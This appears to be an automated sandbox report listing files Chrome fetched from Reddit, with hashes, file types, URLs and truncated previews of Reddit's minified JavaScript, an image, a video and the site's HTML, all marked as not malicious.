                                                  SHA-512:CFF421FF0CD481189AE43E5111C74D3D3B1FC59F0DAE0693890D954B13F43A17330831092A9D6341EE5193F700324DC089F400AC8C8C45D704BA10CCDA340575
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/upload-350fce7d.js
                                                  Preview:import{K as e,O as a,x as t,b as o,eb as n}from"./shell-4994f581.js";import{bn as i,cC as r,bm as s}from"./club-award-confirmation-client-js-b22d6f4f.js";var c,d,l,u,p,f,m,y,_,h,w,g,v,b,P,S;function M(e){window.Sentry?.captureMessage?.(e)}function k(e){return e?.[0]?.message??r.genericErrorMessage()}async function L(o,n){const s=i.get(o);if(!s)throw new Error(r.unsupportedMimetype(o));const c={mimetype:s},d=n?await async function(e,o){try{const n=await fetch("https://gql-fed.reddit.com",{method:"POST",headers:{Accept:"application/json",Authorization:`bearer ${o}`,"Content-Type":"application/json","X-Reddit-Loid":t.get("loid")??""},body:JSON.stringify({extensions:{persistedQuery:{version:1,sha256Hash:"cd9afac180f0cc91f6b6a4be46385de14fc328090a59b2cdc5e9666cb18779f1"}},operationName:a.CreateMediaUploadLease,variables:{input:e}})});if(n.ok)return n.json();const i=await n.text();throw M(`Media upload lease request to gql-fed.reddit.com failed with status ${n.status}: ${i}`),new Error(i)}ca
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1901)
                                                  Category:downloaded
                                                  Size (bytes):1957
                                                  Entropy (8bit):5.200295588841025
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:529336F855AAD3B9F520E106647C5EDE
                                                  SHA1:1E769A5B9933AE8EA1A76870C1263520EBF6C846
                                                  SHA-256:3DEF9B6E58AF7E908F83DC344B7D5A993060CC6A1233363BD777B4CB1CB4C6CD
                                                  SHA-512:D91DB017FAF3ECFBC958C37DEB9FEFDB82F7C94A95B579434152FA551B1D93408B001A545F28267315AA447D912488EA4BC8558708A4DB96C51FA7FA55B5BE76
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/password-recovery-fa619c78.js
                                                  Preview:import{x as e,gj as t,aC as o,eL as a,gi as s,gk as n,L as r,bb as c,gZ as i,g_ as m,l as u,b as l,a$ as d}from"./shell-4994f581.js";function g(e){localStorage.removeItem(function(e){return`chat:${e}`}(e))}function f(){(function(){let e=["access-token","matrix-user-id","matrix-access-token"];for(let t of e)g(t)})(),function(){try{window.indexedDB.deleteDatabase("matrix-js-sdk:reddit-chat-sync")}catch{}}()}function w(){e.remove(t),e.remove(o),e.remove(a),e.remove(s),e.remove(n),f()}const h="comment-draft-items-";var v;!function(e){e[e.Submit=0]="Submit",e[e.Discard=1]="Discard",e[e.Other=2]="Other"}(v||(v={}));let b=window.location;async function p(){await fetch(c.Logout,{method:"POST",headers:{Accept:"application/json","Content-Type":"application/json"},body:JSON.stringify({0:"1",csrf_token:e.get("csrf_token")})}),window.google?.accounts?.id?.disableAutoSelect?.(),e.remove(i),e.remove(m),u.removeItem(r.RecentPages),u.removeItem(r.RecentCommunities),u.removeItem(r.RecentSearches),w(),Ob
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 576x1024, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):38506
                                                  Entropy (8bit):7.993424329654417
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:70DF864A173F7565359C2290553B190D
                                                  SHA1:09B59926B161A6740411004CBCFA1163C9DC3C56
                                                  SHA-256:18DFDC5FE9CD85C5DA489B157D0485A0CA7D62CE093D2C458221628B15EE7A41
                                                  SHA-512:41026E0B648A1C9784D9ADF07717A93BBB3CEB9D4D47F48536EC2ACD050F0BD481B74644CF9364E26D077D8555CF2A47EFBBA91B61249DFFF355BC94A77175B9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/i-think-pete-hegseths-kids-might-hate-him-v0-OTJnaHBodzk5YndlMd0hpW0lAgCzMB7MUI_XeP3rF9agic2tXSm1B1nV-B5B.png?format=pjpg&auto=webp&s=4f8ae360bb6a89be31082a5ee64bb0cf29a12baa
                                                  Preview:RIFFb...WEBPVP8 V........*@...>Q$.F#.....K.P..in...E}...........|...w.s.w.....n.!..pO..K9.....w...3..9.YR....1.................s?....W.k.w.....:.......?......1.....^..Q....R..?..............?...m..}.>......?.}.~...._...?..i|6.....[.S...?d}......]......._.r..~a.{..._....b..............O.Od...........|..1[;;y...<..lis.wD{...8..(e....[|.?.Y~.D..|..O.......I........mZ......0t@ia.::~.....b82^...I.x.Au~..k.U..A..+uB.X.v ...>..N.%..,3.\.$.k.(D/..1.oG.Y.z.E/..<..[k.._._.....w@H....k.g<.VtC[d..n..y...Up..a...xA{........#KR.&..yJO.!.-f..1.;..........|....D..l..Vd.osR)..E....+.A.ix1....G,.Gk.?G..+....[.:..+.Nj.b9-..*... 3t./.O...A...c...G....pO...s.n...k.v.8.....g..x=.T. .j.....i.`.c<..;C.........m|f.]f.0K.....,.fm.7.A.$%..(.E....m.4 .l{..[...h)..j~..?k..V>Y.NQaM0v.y.V..../.....z.*..,........r$.P.F.....gC=......VL.".5.....A..|.?N...<..^...}fi...'.*.a..h.G..p.*.,..Go.....M.^...r.S0xc...>.F=.|H$.....O.JA].)..b.\.4.k...3].+0........S%;....G.U........
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):192
                                                  Entropy (8bit):5.037783434701241
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:76C270B50A161F291EE4C88B3090C3A0
                                                  SHA1:8A8EFFD47A7D2FC8CA378BC9FDED588780173CAC
                                                  SHA-256:94226A99185227ED1EA9716B11C074ED176234C19F1C06843ADAEDFA137772ED
                                                  SHA-512:89DF0C68C2F181A72FC5CFFBF851885EA39BFEE6ABA22337389B1E05F7A0598379522591E0C088EE5E93AE6786B20F7C5E6FDAB7EB73C4EB03C7F3D8783EF1E6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/viral-community-client-js-4ec0c36b.js
                                                  Preview:import"./app-selector-client-js-489f074c.js";import"./shell-4994f581.js";import"./icon-4d9be652.js";import"./index-56e4320e.js";.//# sourceMappingURL=viral-community-client-js-4ec0c36b.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (9255)
                                                  Category:downloaded
                                                  Size (bytes):9317
                                                  Entropy (8bit):5.1283503815678415
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C1A11D4B21893CC733CA294678CACF8C
                                                  SHA1:E4FFABBEDCE62C9D98A73A1A0DDA9485A49AFF21
                                                  SHA-256:108ABA0D1DB5BD11AB6C7F9ABCE0B9D96A11F5A0DDF777D62058F6AE28E7C54D
                                                  SHA-512:66A2D58DC50CB86748E09298B04327B77A0BCB05DABF5AEAACF63D15A8459570609172AFE7BB4BA7EDFFBAF0633C19041AEAE13084E54B0D8984D877A16C8E43
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/flex-left-nav-container-c40bb411.js
                                                  Preview:import{x as t,z as e,a as n,cL as i,cM as s,cN as a,_ as o,g as r,n as d,cJ as l,b8 as h,e as c}from"./shell-4994f581.js";import{aq as p}from"./club-award-confirmation-client-js-b22d6f4f.js";import{a as v,i as m,F as u,b as x,c as f}from"./flex-nav-2ca2e7d8.js";import{x as E,A as y,a as g}from"./icon-4d9be652.js";let b=class extends(n(h)){constructor(){super(...arguments),this.isHovered=!1,this.hoverDelayStart=250,this.hoverDelayEnd=500,this.preventNextAnimations=!1,this.containerElement=null,this.contentsElement=null,this.expandButton=null,this.collapseButton=null,this.gridTransitionPromise=null,this.gridTransitioning=!1,this.trigger="hover",this.interactionController=new p(this,{hoverDelayStart:()=>this.hoverDelayStart,hoverDelayEnd:()=>this.hoverDelayEnd,isInteractedWith:t=>t.isHovered}),this.noAnimate=!1,this.parentGridSelector=".grid-container",this.handleSlotChange=t=>{const e=document.getElementById(u.ContainerDiv),n=document.getElementById(u.ContentsDiv),i=document.getElementBy
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ISO Media, MP4 v1 [ISO 14496-1:ch13]
                                                  Category:downloaded
                                                  Size (bytes):34540
                                                  Entropy (8bit):7.930982973458285
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4101EFA67B4B8FE1F477BEA6991C6843
                                                  SHA1:35C66AA6488A3159753F41CBD68284C695261CDA
                                                  SHA-256:C29546271C6DD13B5F95FD69E3DF676896F4F87A7DACC6FA351E126831408482
                                                  SHA-512:0829C6DC27DA92F1AC3F4B5BC49C243A1E44050330D6BF5FB31BB492F2FD689F4AD9D80118F803F19968BFA1040EC440F574AC826C75972CFBAFE8A72E4F448C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://v.redd.it/m1lypa16y7we1/DASH_96.mp4:2f91f7f9b1b0c4:0
                                                  Preview:...(ftypmp41....iso8isommp41dashavc1cmfc...0moov...lmvhd.....,o..,o...@.....................................................@...................................meta....... hdlr........ID32...............hID32......ID3......PPRIV...F..https://github.com/shaka-project/shaka-packager.v3.2.0-53b8668-release....trak...\tkhd.....,o..,o.............................................................@....`...x......mdia... mdhd.....,o..,o...@............-hdlr........vide............VideoHandler....7minf...$dinf....dref............url ........stbl....stsd............avc1.........................`.x.H...H.........AVC Coding............................2avcC.M@.....gM@..a..j....................h... ....colrnclx...........stts............stsc............stsz................stco............vmhd...............8mvex....mehd......@.... trex..............@............hsidx..........@............................3......................."..........................@........pmoof....mfhd...........Xtraf....tfhd
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (5252)
                                                  Category:downloaded
                                                  Size (bytes):5321
                                                  Entropy (8bit):5.184582250153898
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:35BE8B327F4D82CC91948349DC457563
                                                  SHA1:5A64AEEC27E1E66174BE2CC4D344DDFB1A262EFE
                                                  SHA-256:D23947C56475CDFD45087F4A969C8FB4DC1257A49D0EE1549DEB4ED7F78747DA
                                                  SHA-512:CAF5A705AB0D87519D14FFEE1A69484A405F85A73763F8336F615CE6F1EDF09C935B03203C03CBCE59719064C8AD034B4F17C6DAF38F459671BE3F8A962619F3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/translation-intervention-modal-db1a7e08.js
                                                  Preview:import{a as t,t as e,_ as i,av as s,g as a,n,I as o,aw as l,P as r,l as d,L as c,T as h,u as p,v as m,ax as u,e as v}from"./shell-4994f581.js";import{s as b,x as y,c as T,I as x}from"./icon-4d9be652.js";import{g as f,h as I}from"./translations-13fc818b.js";import"./chat-mobile-xpromo-client-js-58e17cee.js";import"./app-selector-client-js-489f074c.js";const g=t(b),k="translation-intervention-modal",{I18nPostTranslationOverride:C,I18nCommentTranslationOverride:w}=h,O=()=>!!d.getItem(c.I18nTranslationInterventionShown),A=()=>d.setItem(c.I18nTranslationInterventionShown,"true");let S=class extends g{constructor(){super(...arguments),this.translationContextValue=l,this.open=!1,this.pubsub=new r(this),this.handleTranslationOverride=t=>{t.isContextUpdateEvent||O()||this.open||(this.translationOverrideActive=t.isTranslationActive,this.translationSourceId=t.id,this.show())},this.show=()=>{O()||(this.open=!0,this.modal?.showModal(),A())},this.close=()=>{this.translationOverrideActive=void 0,this
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2400)
                                                  Category:downloaded
                                                  Size (bytes):2464
                                                  Entropy (8bit):5.176109426236612
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FA2CAFF6E54EF099AE07406AF76AAFB8
                                                  SHA1:8E66361D4EF73FF5E174CF8E8F0C783BF8CB1DBF
                                                  SHA-256:DA978582373B0891D40E4DED61F7527E994A64E7B32B19CA9B6284966C868CF7
                                                  SHA-512:446ECBF1E400EB1A89FBE9C449AAE41ABA03EFC7D68567BA86A52EF59CC555D3181141E8F4888866BF5CB67EC441D265855D36C658B6893315A0BE502150FB27
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/guides-entrypoint-tooltip-5b8e1fc8.js
                                                  Preview:import{a as t,P as e,T as o,z as i,C as s,x as n,b as p,t as r,_ as l,n as a,I as h,av as c,aN as u,e as d}from"./shell-4994f581.js";import{G as y}from"./guides-224224e6.js";import{x as b,s as m}from"./icon-4d9be652.js";import{R as T}from"./rpl-tooltip-958cc522.js";var g;let k=g=class extends(t(m)){constructor(){super(...arguments),this.entrypointType="hamburger",this.country="US",this.isUserLoggedIn=!1,this.pubsub=new e(this),this.onClickHandler=t=>{t.target instanceof g&&(t.stopPropagation(),t.preventDefault()),this.tooltipElement?.hide()},this.showTooltip=()=>{this.tooltipElement instanceof T&&this.tooltipElement.show()},this.handleTooltipOpen=t=>{"hamburger"===t&&"navbar"===this.entrypointType&&this.tooltipElement?.hide()},this.onTooltipOpen=()=>{"hamburger"===this.entrypointType&&this.pubsub.publish(o.GuidesEntrypointTooltipOpen,"hamburger");const t=this.cookies?`${this.cookies}|${this.entrypointType}`:this.entrypointType;i({country:this.country,name:y,value:`${t}`,options:s}),thi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2039)
                                                  Category:downloaded
                                                  Size (bytes):2094
                                                  Entropy (8bit):5.183575742985684
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7933289DB247001625572CA6DF291D96
                                                  SHA1:4342B3E075DB862D63D04E4F6C02ADE60D02AF34
                                                  SHA-256:998C5C5FA0BD2444AF95682F3C3AC4510464EB4C0746A7E91E8B2A01C8F16F94
                                                  SHA-512:2FD6589C83A8F78A2B08E9532FB9334E7FEC1C33B231A9211C8BC9545F3B0A16A50352859F46142175D61E343FFAB9306187E15B0DF3E15F7EAA6F6F1A84CCEE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-notes-opener-2372b76a.js
                                                  Preview:import{N as t,_ as e,n as s,e as r,T as i}from"./shell-4994f581.js";import{d as o}from"./mod-notes-c8ab3c80.js";import{s as d,x as n}from"./icon-4d9be652.js";const p=t(d);let u=class extends p{constructor(){super(...arguments),this.subredditName="",this.userName="",this.thingId="",this.subredditId="",this.userId="",this.forceOpen=!1,this.postId="",this.isUserDeleted=!1,this.triggerSource=o.USERNAME,this.openModNotes=async t=>{const{subredditName:e,userName:s,thingId:r,subredditId:o,userId:d,triggerSource:n,postId:p}=this,u=t??n;this.publish(i.ModNotesRailOpen,{subredditName:e,userName:this.isUserDeleted?"deleted":s,thingId:r,subredditId:o,userId:this.isUserDeleted?"deleted":d,triggerSource:u,postId:p})},this.handleAnchorClick=t=>{t instanceof MouseEvent&&0!==t.button||t.ctrlKey||t.metaKey||(t.preventDefault(),this.openModNotes())},this.preventAnchorClick=t=>{const e=t.target;if(e instanceof HTMLSlotElement){e.assignedElements().forEach((t=>{(t instanceof HTMLAnchorElement||this.forceOp
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (59781)
                                                  Category:dropped
                                                  Size (bytes):338414
                                                  Entropy (8bit):5.203144306237498
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:CE365C91767644EE6AF1A51C3D898D42
                                                  SHA1:C67E7DEEAF5EC2D1320396694522B8258AFA50DF
                                                  SHA-256:60BF13D130241EE8C195D550C9166D3292FB10D7B337385F0909EF3E9F10DC4B
                                                  SHA-512:3B5E68ED67F4F6E3F1BD1A94F8A59819FD71753CF635E3842A75F0853E1D9DF358705EC5203C4C442138C1C748F1E08C644F23CA2139985EB9CD4A3BA3BC65C3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:. <!DOCTYPE html>. <html lang="en-US" class="theme-beta">. <head prefix="og: https://ogp.me/ns#">. <title>Reddit - The heart of the internet</title>. <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">. <meta name="apple-mobile-web-app-capable" content="yes">. <meta name="apple-mobile-web-app-status-bar-style" content="black">. <meta name="msapplication-navbutton-color" content="#000000">. <meta name="theme-color" content="#000000">. . . . <link rel="preconnect" href="https://www.redditstatic.com/" crossorigin="anonymous" />. <link rel="dns-prefetch" href="https://www.redditstatic.com/" />. . . <script type="module" nonce="XL2D5wsAXL7hPVoKtb5Z6A==">let n;Promise.resolve();let e=null;async function i(){return e||(e=async function(){if(n=window.navigation,!n){console.log("Navigation API not supported, loading polyfill");try{const{applyPolyfill:e}=awa
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (5490)
                                                  Category:downloaded
                                                  Size (bytes):5567
                                                  Entropy (8bit):5.193361081639012
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:690F719A383CD1513E73A899534BA0F9
                                                  SHA1:2DD753330AA38A037B18C66CF6A32C3EF7794ABF
                                                  SHA-256:6193D1F80B35897A8AF55B46A20469507DB59322BDF1647DDE9D840CA9D5B512
                                                  SHA-512:D44F2AEA7900C10F13C1441986B782F11560E1781CBBF4CE3D20D3E9DA5C934ED12C87478EA09C4436D4DEB414324EDD9B4DD72E5E6E8F99461DE92AFD9DAB66
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-content-state-indicators-client-js-6fc5ebb5.js
                                                  Preview:import"./header-action-item-chat-client-js-98797a42.js";import{N as t,T as e,t as s,_ as o,n,e as i,a as r,P as a,u as d,v as c,b as p,H as l,K as u,O as h,a3 as m,c as b}from"./shell-4994f581.js";import{C as g}from"./comment-6e87a634.js";import{R as z}from"./distinguished-tags-28b29a34.js";import{P as y}from"./overflow-menu-actions-fd509c7d.js";import{o as S,x as v,a as I,s as k,ay as f,I as R,az as U,l as C}from"./icon-4d9be652.js";import{l as w}from"./expandable-section-header-e3f969c2.js";import{c as P}from"./links-27a3f3ef.js";import"./subreddit-posting-eligibility-cf0ca862.js";import"./club-award-confirmation-client-js-b22d6f4f.js";let j=class extends(t(k)){constructor(){super(...arguments),this.status=z.Reported,this.handlePostUpdate=({postId:t,action:e,value:s})=>{t===this.thingId&&e===y.ignoreReports&&(this.status=s?z.Ignored:z.Dismissed)},this.handleCommentUpdate=({commentId:t,action:e,value:s})=>{t===this.thingId&&e===g.ignoreReports&&(this.status=s?z.Ignored:z.Dismissed)}}c
                                                  No static file info